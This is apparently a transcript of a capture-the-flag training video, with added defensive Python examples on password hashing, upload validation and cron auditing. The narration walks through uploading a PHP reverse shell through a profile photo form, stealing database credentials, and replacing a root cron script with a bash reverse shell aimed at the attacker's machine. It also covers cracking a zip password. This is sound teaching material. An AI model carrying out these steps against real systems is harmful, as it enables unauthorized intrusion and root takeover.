okay this is what we're to fuzz we're going to do a dash u and we're going to do http 192.168.138.129 and we're going to say forward slash FUZZ so we're telling this is hey with this word list we're going to be fuzzing with this word list we're going to fuzz this parameter right here this is exactly what we're doing okay we're going to hit enter and this is immediately going in and just doing all that we want to do it found academy right away phpmyadmin right away and this is very fast found a server status and all it's doing is looking one thread deep so it's not doing what dirb is doing dirb is going and saying hey i found phpmyadmin now i'm going to go through and find every single directory inside of that in every single directory inside of those directories which can take a while this one is saying i'll find all the the first level directories if you want to go search those you can like we could type in academy FUZZ there's commands in here that we can do to take this further we can limit which response statuses we want maybe we only want 200s or maybe we want 302s depending on this so maybe we don't want any 401s or 403s or 405s we only want the ones that come back as 200 guaranteed so in this case we're looking like we got a 301 from academy so there's a redirect there same with the phpmyadmin all right so with that in mind this is how you can find it found it quick this one's still going there's different strategies different tools everything else this one's pretty nice there's a lot of tools that come out for directory busting all the time latest ones are being built in rust which is interesting because rust is really fast there's ones built in go because go is really fast so you pick your poison on a directory busting tool and you just run with it so anyway we're gonna go ahead and enter in that registration number so you can go ahead and just come copy it from here and then you're going to go ahead and paste that and then the password is student for me
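Added example, not from the course: why the md5 hash pulled from note.txt above was a finding, and what the fix looks like. The first function does in a few lines what the hashcat step did, a wordlist run against an unsalted md5, so the weakness is visible; the second pair stores and checks passwords with a salted, iterated PBKDF2 from the standard library. The record, registration number and tiny wordlist are constructed stand-ins.

```python
import hashlib
import hmac
import os

# Constructed stand-in for the database insert from note.txt: the app stored
# md5(password) with no salt. The wordlist is a tiny constructed slice that
# plays the role of rockyou.txt.
LEGACY_RECORD = {"reg_no": "STUDENT-01", "password_md5": hashlib.md5(b"student").hexdigest()}
WORDLIST = ["123456", "password", "academy", "student", "letmein"]


def md5_wordlist_match(stored_hex, wordlist):
    """Unsalted fast hash: one md5 per candidate, no per-user work, and every
    account using the same password shares the same stored value."""
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == stored_hex:
            return word
    return None


# Iteration count is the cost knob; OWASP's current guidance for
# PBKDF2-HMAC-SHA256 is in the hundreds of thousands.
PBKDF2_ITERATIONS = 600_000


def hash_password(password, iterations=PBKDF2_ITERATIONS):
    """Return a self-describing record: algorithm$iterations$salt$digest.

    A fresh 16-byte salt per user means the same password yields a different
    record each time, so a wordlist has to be rerun for every single account."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; constant-time compare."""
    algo, iters, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iters)
    )
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


if __name__ == "__main__":
    print("legacy md5 record falls to:", md5_wordlist_match(LEGACY_RECORD["password_md5"], WORDLIST))
    record = hash_password("student")
    print("hardened record:", record[:40] + "...")
    print("verify correct / wrong:", verify_password("student", record), verify_password("Student", record))
```

The password policy finding still stands on its own: a slow salted hash only buys time against a guess as weak as "student".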
i've changed the password in here because i've already gone through this box but you'll be brought to a change password screen so you could type in student change it if you want to you really don't have to you can come in here and start clicking through hey i want to enroll in a course enroll history my profile change password etc um so this is really what we have now the interesting thing in here is that we have this um upload photo feature so if we look at this we can come in here and say okay how do we want to attack a website what are some ways that we can get code execution we might be able to perform like lfi rfi attacks on this and pull down information or execute code maybe there's sql injection somewhere in here we can pull down and dump the database we did see a phpmyadmin maybe there's more behind this behind the scenes that we can do we can also go out and something that we didn't really look at on the first scan is we can do a version check like we didn't check on this version to see if there's a vulnerability there that would be something you can do same with the openssh same with the apache you can go and do those i'm only not showing you that because i'm saving time here but the correct methodology would definitely be to go check these as well to see if there's any vulnerabilities now there is in here a this is a online registration you can look and see if there's any way to pull down like viewing the source and see if maybe anything in here would tell you hey what cms is this what is this built off of because clearly this is a cms of some sort that they've used now with that in mind we can go back and we can kind of just look and see if we can find anything the first thing we might want to do is just come in here and do a browse and come and say okay i'm going to upload let me go to my my desktop i'm going to upload a picture of a dog you don't have to do this i just want to see if it works okay so i uploaded a picture of a dog perfect now the 
question here is and by the way we can see up here that php is in use so i'm going to make this a little bit bigger by the way but php is in use so it should say my-profile.php um what we want to do is we want to see if we can upload a file that is not not a dog okay like not a jpeg not a gif not a not whatever png we want to see if we can upload something that's not a photo and abuse the file upload system if they're doing no checks here and we can just upload this they are in big trouble so what we can do is we can right click and go we can view image which will tell us kind of where the the image is stored so it's stored in academy student photo forward slash and this is dog.jpg which is what i uploaded so what we can do let me refresh this what we can do is try to upload a reverse shell here and see if we can't get a connection back by viewing this let's see if we can upload something malicious now we know this is apache so we're going to upload via php so i'm going to go ahead and do that what i want to do is go out and we're going to do a quick search we're going to go to google and we're going to say php reverse shell and there is a great one out there from pentestmonkey okay first hit should be up here there's other ones that you can use people have their preferences and their favorites this one is six years old and still works perfectly so all we're going to do is go raw here and copy this control a control c and what i did was i went ahead and put this into a um a file here so let's go ahead and clear screen you can just do mousepad gedit nano whatever you want um actually i might nano this just so you can see but i called this shell.php and then i pasted it in here that's all you got to do shell.php paste it in here i'm gonna scroll down a little bit you're gonna get to this little part after the comments and you're gonna see hey it says change this change this you need to put in your ip address whatever your ip address of your attacker
machine is that needs to go here so if you need to open up a new tab come in here do ip a or ifconfig 192.168.138.131 come back that matches what i've got one two three four in my opinion is fine you can leave it as is for this machine so control x this is fine you can hit yes save if it asks you to just hit y and enter and that will save your shell.php so we have shell.php we need a listener we're going to do a reverse shell here so one two three four on the -nvlp on netcat this should not be unfamiliar to you should already be aware of this so we're gonna go here and now we've got this listening we're waiting for something to happen so we're gonna go back into this and we're going to upload this malicious file so i put this in my root folder shell.php click update come in here you can see nothing's happened let's see if it tries to execute oh it already executed so we don't even have to go to like we don't have to right click and go to that um that location it already executed that file when it loaded this page which is crazy so we have a we have a shell here which is great so if we do a whoami you can see we are the www-data user so we are not we are not an admin on this machine we are not root we can do a sudo -l but they rudely took away sudo we could type in which sudo and see if it's there locate sudo maybe they put it somewhere else locate not found either so they're playing a little bit of games with us just a little bit because we should be able to run and see hey what privileges do we have as sudo but it's not there that's okay though we still we're still going to be fine so what i want to do next is we land on a machine we're not a root user we need to perform privilege escalation this is where things get fun and this is where we're going to take a bunch of winding roads to get to where we're getting so what we're going to do now is we're going to use a tool called linpeas and we're going to utilize that to do some searching linpeas is a
automated tool that goes out and does uh basically hunting for any sort of privilege escalation and i kind of cheated a little bit let me go to google and just type in literally l i n like linux p e a s like the food peas hit enter you'll see it here in github and linpeas.sh updated three days ago nice all right and this is going to go through and perform all kinds of checks to see if there are any escalation privileges or privilege escalation or paths for us with privilege escalations what i should say so you can go in here again raw control a control c and what i like to do and this is how i actually operate is i like to mkdir a transfers folder i call it transfers and i've already got one so i'm just going to cd into transfers or transfer is fine as well ls in here and linpeas.sh is already in here so you can nano linpeas.sh same thing just go ahead and get it into this folder and have a nice little transfer folder make sure you copy paste it put it into a file and have it ready to roll so what we're going to do is we're going to host up a web server so we're going to say python3 dash m for module and we're going to type in http.server 80.
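Added example, not from the course: the checks the profile photo upload above was missing, written as the validation a developer would put in front of the studentphoto directory. It contrasts what the vulnerable page did (keep the user's filename and drop the bytes under the web root, where apache executes a .php) with an allowlist of image types, a content-signature check, a single-extension rule that also stops shell.php.jpg, and a server-chosen random filename. The signatures table, size cap and sample bytes are constructed for the example; the language is python rather than the app's php to keep it runnable here.

```python
import os
import secrets

# Allowed photo types: extension -> content signatures the bytes must start with.
# Constructed allowlist for this example; it is deliberately short and never
# contains anything the web server could execute.
IMAGE_SIGNATURES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MAX_PHOTO_BYTES = 2 * 1024 * 1024

# Constructed sample inputs: a stub JPEG header and a harmless PHP stub that
# stands in for the uploaded shell.php from the walkthrough.
SAMPLE_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 32
SAMPLE_PHP = b"<?php echo 'not a photo'; ?>"


class UploadRejected(ValueError):
    """Raised with a reason the application can log (never echoed verbatim to the user)."""


def vulnerable_destination(webroot, filename):
    """What the academy profile page effectively did: trust the client's name
    and place the file under the web root. Returned only to show the path a
    shell.php would land on; nothing is written."""
    return os.path.join(webroot, "academy", "studentphoto", filename)


def validate_image_upload(filename, data):
    """Return a server-chosen storage name for an acceptable photo, else raise."""
    base = os.path.basename(filename.replace("\\", "/"))   # drop any directory parts
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        # exactly one extension: blocks shell.php.jpg and bare/hidden names
        raise UploadRejected("filename must be name.ext with a single extension")
    ext = parts[1]
    if ext not in IMAGE_SIGNATURES:
        raise UploadRejected(f"extension .{ext} is not an allowed photo type")
    if not data or len(data) > MAX_PHOTO_BYTES:
        raise UploadRejected("empty or oversized upload")
    if not any(data.startswith(sig) for sig in IMAGE_SIGNATURES[ext]):
        # the extension says image; the bytes must agree
        raise UploadRejected("content does not match the claimed image type")
    if b"<?php" in data or b"<?=" in data:
        # a real image carrying PHP is still dangerous if any handler ever
        # executes by content, so refuse it outright
        raise UploadRejected("script markers found inside image data")
    # the user never controls the stored name; the extension comes from the
    # validated type, not from the request
    return f"{secrets.token_hex(16)}.{ext}"


def store_upload(upload_dir, filename, data):
    """Write a validated photo into upload_dir, which should live outside the
    web root (or be served with script execution disabled). Returns the path."""
    stored = validate_image_upload(filename, data)
    path = os.path.join(upload_dir, stored)
    with open(path, "wb") as f:
        f.write(data)
    return path


if __name__ == "__main__":
    print("vulnerable page would write:", vulnerable_destination("/var/www/html", "shell.php"))
    for name, data in [("dog.jpg", SAMPLE_JPEG), ("shell.php", SAMPLE_PHP),
                       ("shell.php.jpg", SAMPLE_JPEG), ("dog.jpg", SAMPLE_PHP)]:
        try:
            print(f"{name}: accepted as {validate_image_upload(name, data)}")
        except UploadRejected as why:
            print(f"{name}: rejected ({why})")
```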
okay and this is going to host up a web server in this folder we're going to go and grab this file on this machine so a good place to put a file that we want to we want to dump on this machine is we're just going to put it right into the temp folder so cd into temp print working directory we're in forward slash tmp okay so what we're gonna do now is we're going to do a wget http your attacker machine ip so i'm at 131 forward slash linpeas.sh hit enter it should copy over you could see it coming through do a quick ls i already had linpeas on here because i was running through this box earlier but i'm going to use the original linpeas so pretend with me we need to make it executable chmod plus x or change mode linpeas.sh okay now we're going to run it dot forward slash linpeas.sh just like that hit enter it's going to start just flying across the screen it might take a minute to go through we're going to go through some of this but i'm going to give you the general gist of what you're looking for and the things that you want to look for in here so i'm going to take this and scroll back up to the top if yours isn't done running yet that's fine i kind of just want you to watch anyway on this one so we run it we get a nice little ninja turtle cute uh and you go through and it tells you the legend on here okay and it says hey red yellow means 95 could be a privilege escalation vector red you should look into it and then it gives you a different one so really we're looking for red and we're just trying to see if we can find anything in here that could be of interest for us now as we're scrolling through it gives us information about the um you know the linux distribution the release all that that could be useful if we have some sort of escalation against this there are different types of escalation that we could use and the release information could be important to us though it is not for this machine so we're going to skip over it for now you go through it tells you all
kinds of stuff about the operating system, what's running on it, and it's looking for anything that could be of interest. Now it's telling you hey, what do we have that we can run? This just says yes, this is a virtual machine. Keep going through, keep going through. This is looking at cron jobs, which we'll talk about in a little bit. This is looking for any sort of systemd timers or cron jobs. We have no cron jobs running that look relevant to us. This is just running apache2, this is running a... and this actually looks like it could just be the processes running, not even the cron jobs. So these are just the processes running, nothing of interest to us right now. Scrolling through here, we're just going to look and see if we find anything of interest. Now there is a highlighted red and yellow here with /home/grimmie. We're going to copy that bad boy, see what it is, and then from here you're going to go ahead and just keep scrolling.

So we come through, keep scrolling, keep scrolling, and a lot of this is just information that is provided to us. What is of interest for this machine? Now you're welcome to read through this, there's a lot of data to read through. I like to scroll through kind of really quick and just see if anything stands out, not at this pace, but like right here, look, we're scrolling through and we see hey, there is a MySQL password of "my very secure pass". That is of interest to us. It looks for passwords, and we're going to scroll down to the bottom, I'll show you kind of what it looks like. So if we scroll all the way down, then start scrolling up a little bit, you'll see that the "my very secure pass" shows up again. It shows up right here and it tells you hey, this is in this includes/config.php file. So that's really what we're looking for. We've got a password up here, manage students at one two three four five, so we can go look at that if we wanted to, and some things in here that we want to make note of. So maybe we open up a notepad, like we come into
a text editor, we just do a paste here, because of the grimmie items of interest: we found the password of "my very secure pass", which maybe we want to just copy this whole thing out. Okay, and I might put that into my little notes as well, and maybe I want to read this document and see what's in here as well. So this is of interest, we want to go through and just see anything of interest. Now I am skipping ahead just a little bit, only to save time for the video; there will be other opportunities to learn privilege escalation, and again we have the privilege escalation course if you want to go through this in more detail. This is again just trying to get your feet wet, introduced to the idea and understanding what we're doing here.

So now let's go ahead and look at the file that we just found. First we'll wait on the grimmie file, let's go ahead and just cat this out. Okay, so if we cat out this config.php, we see that we get a SQL user of grimmie, we get "my very secure pass". Okay, we get some information there, so we can maybe try to see if this works for us anywhere. It's a SQL user database, maybe we can get into the SQL database and find some information. That is one option, though I did not see any sort of information for SQL unless we could log into phpMyAdmin with this on that web panel that we're looking for, so that's something that could work. We also want to see if there's anything... maybe we go cat /etc/passwd, see if that works for us. Okay, so /etc/passwd is showing us all the users on the machine. Of interest, we like to scroll down to the bottom, and we see a user of grimmie, and it says grimmie's an administrator, which is interesting. So it's pointing to grimmie being a user on this machine, so it doesn't hurt to just copy this password and see what we can do with grimmie. So what we can do here is I'm going to go ahead and just go to a new tab, and I'm going to cat... and by the way, we should have known that anyway because there was a folder called /home/grimmie/
backup.sh, or /home/grimmie, so grimmie would have been an indicator anyway that we were up against a user named grimmie. So we do ssh, we can do grimmie@ and this machine is 192.168.138.129 for me. Go ahead and hit enter once you've got it in there and it should ask you, your first time, about a fingerprint. Just type in yes, hit enter, and then go ahead and paste in that password that we just got. And maybe I copied it wrong, so I'm going to go copy that one more time. Okay, and here we go, so now we are in this machine. We don't have sudo access, I don't believe. sudo -l... again it says sudo not found. It could be that we have a broken version of bash, or they intentionally removed it because it's just CTF. That's one of the first checks I do. history is another check, though I have some history in here from myself, so you might not have any history when you come in here, this is just all me doing this. Now one thing that I do again is I like to come in and I like to download linpeas, run it again, see if anything's changed. I'm going to skip over that process, but I'm just telling you for the process.

What we want to do is we want to make sure we look at the file that's of interest. Okay, so that file, when we went and saw, was in the /home/grimmie folder, so let's just go ahead and cd to /home/grimmie and we're going to ls in here, and all we have is backup.sh. Let's run cat backup.sh. So what we have is it looks like it's removing a temp backup file, /tmp/backup.zip; it's zipping up a backup.zip from this var html academy includes directory. So it looks like it's doing a backup of the academy, and then it's changing the permissions of the temp file. So if we look at /tmp there may or may not be a backup.zip sitting in there. So what this is telling me is this is probably going out there and doing periodic checks, or a script is running periodically to perform this backup. So it could be running every hour, every day, every week, we don't know when it's running. Now we can see if by chance we have access to that
information. When we were looking at the cron information from linpeas I didn't see it in there. We could also do a crontab -l to see. Here we have no crontab for grimmie. So what's happening possibly is that grimmie doesn't have the crontab. We can try to see if we can crontab -u root -l, look at root and just do a list, but it says you must be privileged. So we have to run sudo, but we don't have sudo, so we won't be able to switch into root to use that as well, we don't have privileges to do that. So without having any crontab information or seeing it running when we looked at the cron... we could do a crontab -e as well, I just don't... I mean there's nothing in here, so this isn't giving us any indicator. And a cron job is something that will run for us, by the way, and we tell it hey, I want to run this script every hour, every minute, every day, every week. We can tell it when we want it to run. So this is a realistic scenario in that sense, that cron jobs are used in administration.

So from here, if we don't have that, there's something else called the systemd timer. We can look at that from systemctl and just say list-timers and come through like this and see if there's any script in here running that's in a timer, and I actually don't see anything here. You can hit q for quit and that'll exit this. So when we have this situation, there's a tool that we can use out there that will actually give us more information of what's running with the processes than what is being let on. Remember we ran a ps... we ran ps for everybody with the script, the linpeas, we saw it, we didn't see anything in there that was any indication of this backup.sh. So if we want validation and confirmation that this is running on a timer, we can go ahead and go out, and there's a tool out there that is pretty neat, it's called pspy. And all you have to do, literally I have to google this by the way, I'm going to do it just so we could say
we did it. pspy, literally the first thing that comes up. So in here what you want to do is go ahead and download the 64-bit static version, and when you download that you might get put into your Downloads folder. All you have to do is... we'll open a new tab here real quick... all you have to do is do a move command, if you don't remember, so mv Downloads/pspy and just put that in your transfer/pspy. Okay, pspy64 is actually what it's called, I'm just winging it here. I've already got it in my folder, but make sure you move it over to your folder, or if you want to keep it in Downloads and run from there, that's fine as well. Just note that I already have this in my folder here. So all you have to do now is cd over to your /tmp folder. If I ls, I've got some stuff in here, it looks like linpeas, backup.zip is sitting in here. What I'm going to put in here is this pspy and we're going to run it. So I'm going to do a wget, and remember I already have my listener for my web server running from earlier, so this is just going to be a simple grab and go, and this is pspy64. Grab this, all right, ls, chmod +x on pspy64.
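The defender's side of the backup.sh hunt above, added here as an example and not code from the course or the Academy box: it parses /etc/crontab-style lines, picks out the scripts that root's entries execute, and reports whether a non-root user could rewrite them (the file itself or a parent directory being group- or world-writable), which is exactly the condition being probed with crontab, list-timers and pspy. The crontab text and the two scripts it points to are constructed inside demo().

```python
import os
import stat
import tempfile


def parse_system_crontab(text):
    """Return (user, command) for each active entry in /etc/crontab-style text.

    System crontab lines carry five schedule fields, then the user, then the
    command; @reboot/@hourly-style lines carry one schedule field instead.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or VAR=value assignment
        if line.startswith("@"):
            fields, n = line.split(None, 2), 3
        else:
            fields, n = line.split(None, 6), 7
        if len(fields) < n:
            continue  # malformed entry, not enough fields
        entries.append((fields[n - 2], fields[n - 1]))
    return entries


def script_path(command):
    """First token of a cron command if it is an absolute path, else None."""
    first = command.split()[0]
    return first if first.startswith("/") else None


def permission_findings(path):
    """Describe how an unprivileged user could change what this path executes."""
    findings = []
    st = os.stat(path)
    if st.st_uid != 0:
        findings.append("owner is not root")
    if st.st_mode & stat.S_IWGRP:
        findings.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        findings.append("world-writable")
    # A parent directory writable by others lets a user swap the file out even
    # when the file itself is locked down; sticky dirs like /tmp are skipped.
    parent = os.path.dirname(path)
    while parent and parent != os.path.dirname(parent):
        pst = os.stat(parent)
        if pst.st_mode & (stat.S_IWGRP | stat.S_IWOTH) and not pst.st_mode & stat.S_ISVTX:
            findings.append("parent directory %s writable by others" % parent)
            break
        parent = os.path.dirname(parent)
    return findings


def audit_crontab(text, only_user="root"):
    """Map each existing script that only_user's cron entries run to its findings."""
    report = {}
    for user, command in parse_system_crontab(text):
        path = script_path(command)
        if user != only_user or path is None or not os.path.isfile(path):
            continue
        report[path] = permission_findings(path)
    return report


def demo():
    """Constructed scenario: root cron runs one script anyone can edit, one it cannot."""
    base = tempfile.mkdtemp()
    loose = os.path.join(base, "backup.sh")
    tight = os.path.join(base, "rotate.sh")
    for p in (loose, tight):
        with open(p, "w") as f:
            f.write("#!/bin/bash\necho backup\n")
    os.chmod(loose, 0o777)  # anyone may rewrite what root is about to execute
    os.chmod(tight, 0o755)
    crontab = "\n".join([
        "SHELL=/bin/sh",
        "# constructed sample, not a real /etc/crontab",
        "* * * * * root %s" % loose,
        "@daily root %s --quiet" % tight,
        "0 3 * * * grimmie /usr/bin/true",  # not root's entry, so not reported
    ])
    return audit_crontab(crontab)


if __name__ == "__main__":
    for path, findings in demo().items():
        print(path, "->", ", ".join(findings) or "no issues")
```

On a real host, feed audit_crontab() the contents of /etc/crontab and the files under /etc/cron.d; an "owner is not root" finding will also appear in the demo when it is run as an ordinary user, since that user owns the temporary files.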
And we're going to run it. Now what this is doing is showing us all the processes running on the machine, all of them, and we can scroll through this and kind of see. And yours is going to look different than mine; don't worry about the PID numbers, don't worry about the timing, don't worry about anything like that. All you've got to do is scroll through here and see if we can see that backup.sh running. And we can come through, see if there's anything in here, and look, now it showed up, backup.sh. I don't think that was there before. So what happens is it just waits for this to run, and then when it runs we're seeing it come through here. So it looked like it just ran. If we wanted true confirmation we could sit here and wait another minute and see if this runs, because my hunch is it's running every minute, because this is a capture the flag box. So we could do that; I'm going to tell you that it is running every minute, so we don't have to do that, just to save a little bit of time. So ctrl-c, get back into your grimmie@academy, and now we are going to abuse this in our favor.

Let's go ahead and cd /home/grimmie, we're going to go back, make sure you have your backup.sh in there. And now what we're going to do is I want you to google... go to Google and say bash reverse shell one liner. Okay, and there is a reverse shell cheat sheet from PentestMonkey; you could also type that in. Click on that, here you will see right up front, you will see bash -i, you're going to see this right here. This is a one line reverse shell, this is awesome. All we're going to do is put this into a shell script, which we already have, we have it right here. We're going to put that in there, and when it executes it's going to perform a reverse shell. So what we want to do is we want to modify this a little bit. So let's go ahead and open up a notepad real quick. It might be a little bit small on your screen for you, but what I'm doing is I'm putting in, where it says 10.0.0.1, 192.168.138.131, which is my
attacker machine, and I'm going to change the IP address to 8081, or, the port to 8081. You are more than welcome to keep it at 8080; I'm just doing this because I ran through this once earlier and there's a possibility that port is still out there lingering, so just for the video's purpose I'm changing it to 8081. So what does that mean? I have to do nc -nvlp, set up that reverse shell listener, and here's what's going to happen. We're going to come in here and we're going to say nano backup.sh. You can come in here, tab down a couple times, and if you hit ctrl-k it deletes a line, that's the magic if you didn't know it, and you can right click, paste selection, maybe paste clipboard. Okay, and what we're going to do is this is going to execute bash -i ... /dev/tcp/192.168... It's going to call out to our IP address with this, and if our hunch is correct that this is running as the root user, we're going to get a root shell on this. So what's happening is this cron job is out there, it's running as root, it's executing as root, and when it executes that script it's going to execute as a root shell, which it just did. You can see root@academy, whoami, okay. So let's cd to /root just for the fun of the game, maybe cd /root, ls, okay, and then cat flag.txt says congrats, you rooted this box, looks like this CMS isn't so secure, I hope you enjoyed it, if you have any issues please let us know in the course discord, happy hacking. Great, that was an example of a box with a couple of pivots, a couple of different privilege escalations, and very gamified, very capture the flag. You will likely never do most of this on a pen test ever in your life, but it's still important to learn from the hacking process as we build up into this and then as we get into more of the Active Directory stuff. So that is it for this video. We're going to go ahead and call it here and I'm going to go ahead and catch you in the next one.

Okay, on to the box Dev. Now let me preface this with: it is raining pretty bad here, so if you
hear thunderstorms or anything in the back, consider it part of the ambiance. But we're going to do another box from Alec, thank you Alec for creating this wonderful machine, and this box is a Linux machine. So you should already have it set up, we're past the setup stage, you should know how to set it up. Come in here, I already have an nmap scan ran against it, so if you do not have an nmap scan ran against it you should go ahead and do that. Pause if you need to, otherwise you could just follow along. So running the nmap scan, we can see that we have port 22, SSH, and remember what we said about SSH: we're not going to look at it right now. It's nothing that, at least in my experience, I've ever found an exploit for, so unless we have credentials or something for that we're not going to get into SSH. We have something on port 80 called Bolt installation error, for Apache web server. Okay, that's an indicator this might be a Linux machine already, because we're seeing Debian, that's a nice indication. We have rpcbind, which we can enumerate RPC, though it's not that advantageous for us right this instant, that gets into more advanced stuff. Honestly, as a beginner we're going to leave RPC alone, though there is some information gathering that you can get out of RPC. As of right now we're going to just kind of push it to the side because we've got more important things to focus on and more common things to focus on. So we have 2049, NFS, which is a network file share; think of it almost like SMB, like Samba for file sharing. This is a network file share; we can potentially mount to a file share here, so that might be of interest for us. We also have HTTP here for 8080, it just says connection Apache Debian PHP info page. We've got some mountd and nlockmgr. We're not going to worry about any of these ports. Which stand out to me are 8080, 2049 and 80.
Okay, so keep those in mind as you go through these. More as you get better at this, it'll be easier for you to understand which ports you're looking for, which ports you can kind of just throw to the side for now. So with that we're going to go ahead and take a look at 80, we're going to take a look at 8080, then we'll take a look at the network file share. So going out to the web page, I have Google open, I'm just going to go 192.168.138.137, go here, and I'm also going to copy this and take this out to port 8080. And you can see that we have a couple pages. One is a Bolt installation error page, which is interesting. We can come out and look at this, it looks like there's something called Bolt. We can actually go to the real web page here and see what's running, Bolt CMS, so we'll keep that in mind. Maybe they're running Bolt CMS, we could put that in our back pocket, in our notes. It looks like there's an installation error, it's talking about the folder that it should be installed in, which these are Linux folders, so this is more indication that we're likely attacking a Linux machine here. So we can do some research on this, but let's put that in our back pocket for now. The other website here is on port 8080, we're getting a PHP info page, which is nice. Sometimes this can disclose some information; you can actually read through this and see like here's the path, here's like the webmaster, here's the IP address that we're pointing at. So there's some different things in here that we can look at, and possibly, if we were attacking this page, there could be some information disclosure in here that could tell us what the setup is of this PHP page, and that could tell us like hey, maybe there's file inclusion, maybe there's uploading allowed, different attacks that might be enabled because of a setting that is configured or misconfigured in this phpinfo type page. So we have two pages here that are... I mean there's nothing really there, it's like hey, PHP info, Bolt
installation error. So we kind of want to look under the hood. This is just a common tactic here: we're going to open up a new tab, I'm going to open up two of them, and we're really just going to enumerate this a little bit further. I just want to see how far we can take this. If it is what it is, like port 80 is literally just a Bolt installation error page, that's fine, but we need to confirm that. So we're going to use ffuf, whatever you want to call it, and we're going to do a quick scan on this, and we're going to do /usr/share/wordlists and then I go to dirbuster, and just like before you can just tab, and I use the medium wordlist. I put a colon in, I don't know how to... if you know the trick of getting it to line up immediately after, let me know, otherwise just go delete that one space. We can put FUZZ here, and then we can do a URL of http://192.168.138.137 for this machine, /FUZZ. Now before you hit enter, go ahead and copy this, make life easier. Hit enter, let that bad boy run, come in here, paste again, and all we're going to do on this one is we're going to put 8080 at the end of it. So we're going to fuzz against 8080 and port 80.
We're going to let these run a little bit. Okay, so we'll let these run, perhaps finish, see if we can get anything of interest out here. While they're running we can multitask. This is part of the process, by the way; as an ethical hacker, or hacker in general, multitasking is important, because if you're on an engagement like a pen test you're going to be doing a lot of things at once. Imagine a situation where you have a thousand IP addresses and you have a week to go against them. If you only have a week to do a thousand IP addresses, you're talking like a few minutes per IP address to look at, so you really have to identify and scan for low hanging fruit, figure out which IP addresses are the most advantageous, go touch on those more, and, you know, perhaps be spending a couple minutes on each at the same time while you're doing this. So it's advantageous to look at multiple things, have scans running and be bouncing back and forth from an ethical hacking perspective, and you pick up the ability to multitask over time.

So anyway, we have this NFS, this network file share, and I'm curious if there's anything there. So what we can do, I'm going to go ahead and just open up a new tab, make this a little bit bigger. What we can do is we can say showmount; this is a command already built into your machine, if you're familiar with Linux you probably know this. Put an -e there, we're just going to list out the directory that's here, the mounted file share, hopefully there's one. Okay, and we're exporting from here this... okay, this is the file share that's offered up. So we've got, looks like, /srv/nfs, network file share. So what we're going to do with this is we're going to go ahead and utilize this to our advantage. We're going to mount and see what we can see in this share. So in order to do that we need to make a directory to mount to, so I'm just going to make a directory called... mount, /mnt, we have an /mnt folder by default, and then I'm just going to call this dev since that's
the name of the machine. All right, and then we're going to mount this, so we're going to say mount -t nfs, so this is the type, it's NFS, and we're going to say 192.168... and then we're going to do /srv/nfs. Okay, so we're calling out on this machine, is this server nfs or /srv/nfs, and then we're going to put it in /mnt/dev, just like that. All right, so now we can cd into /mnt/dev, ls, and you can see that there is a file in there; that file is called save.zip. So I'm going to go ahead and try to unzip that, and it says hey, we need a password to unzip this id_rsa file. I have no idea what the password is, so it looks like there's an id_rsa in here and a todo.txt, and we don't have the password for either of these. Now there's a possibility that we go online, we look through some of these folders, maybe something comes back, there's a password in there, that's the path to go. The other thing that we can do is see if we can crack this very quickly; if we can crack it, then maybe we can get in there. And there's a tool out there called fcrackzip, so we can do something like apt install fcrackzip, just like this. I've already got it installed, but you should not, it doesn't come by default. Okay, go ahead, let that install, should only take a second, and then come back. And now we're going to do fcrackzip, just like that. Yours might not auto tab, you might just have to type it out, that's okay. -v for verbose, we want to have verbosity here, see all the output. -u just means we're going to be unzipping, so we're going to unzip the files here. And a -D means we're going to be using a dictionary attack, and a -p means we're going to be using a file in order to attack. So the dictionary attack we're using is the /usr/share/wordlists, and then we're going to use... okay, and on this other part, for the -p, we're going to go ahead and use this save.zip. So we're using a string here as the initial password file, which is what we're doing. If we didn't
have this here, it would just start attacking via the files inside. So we're calling out specifically, and then here we're saying we're using a wordlist, here's the wordlist that we're using. So I'm going to go ahead and run that, hit enter. Okay, and you can see that we have found password is equal to java101. So now if we go to unzip save.zip, type in java101, hit enter, okay, ls, they should be here now. So let's cat out the todo.txt. It says figure out how to install the main website properly, the config file seems correct, update development website, keep coding in Java because it's awesome, and then we get a signature from JP. We don't know who JP is, but we do get an id_rsa file. So that id_rsa file can be used in order to connect via SSH. Now we don't know who the user is; there's a chance that the user might be jp. So we can do something like ssh -i... I'm not sure if the permission settings here are going to be correct in this id_rsa file, we'll see here in a quick second. And then we come in here, we say something like jp@192.168.138.137, cross your fingers, type yes. It asks for his password; we don't know a password, so we're not even sure if that's working. We're not sure, it didn't even look like it took the id_rsa, so we're not sure if this guy's even a user. So let's keep this information in our back pocket for now. We have this... we're going to clear the screen... we have this id_rsa file, and we have some information hopefully sitting here waiting for us.

So on the port 80 side we have a public, 301, we have a source, 301, we have an app, 301, vendor, extensions. Okay, so maybe we come in here and we take a look at that. Also on this side we have a dev directory, so if we go in here and we just do /dev, we are brought to this BoltWire application, which is cool. On here we have a few different directories that came back, let's see, we have public, source, app, so we can kind of go through those manually. Just public, see what's
